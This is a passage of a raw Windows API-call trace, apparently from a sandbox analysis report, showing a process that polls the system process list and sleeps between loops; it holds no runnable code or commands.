FreeType=0x8000) returned 0x0 [0225.101] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.103] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.103] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.104] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.104] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.104] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.108] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.109] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.110] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.110] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.111] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.112] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.112] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.116] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.117] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.118] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.119] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.119] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.120] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.123] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.124] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.126] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.126] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.126] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.127] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.130] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.131] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.133] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.133] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.133] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.134] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.137] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.138] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.140] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.140] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.140] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.141] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.144] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.145] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.146] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.146] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.147] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.147] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.147] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.151] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.152] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.153] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.153] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.154] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.154] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.154] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.158] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.159] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.160] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.160] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.161] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.161] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.161] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.165] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.165] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.167] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.168] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.168] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.168] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.174] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.174] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.176] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.176] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.176] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.177] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.177] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.180] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.181] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.184] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.184] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.184] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.185] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.188] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.189] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.191] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.191] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.192] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.192] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.192] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.196] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.196] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.198] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.198] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.198] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.199] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.199] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.202] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.203] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.204] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.204] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.205] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.205] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.205] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.209] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.210] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.211] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.211] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.212] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.212] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.212] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.216] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.217] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.218] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.219] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.219] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.219] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.223] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.223] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.225] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.225] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.226] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.226] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.229] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.230] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.232] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.232] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.232] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.233] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.233] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.236] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.237] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.238] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.239] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.239] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.243] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.243] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.245] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.246] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.246] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: 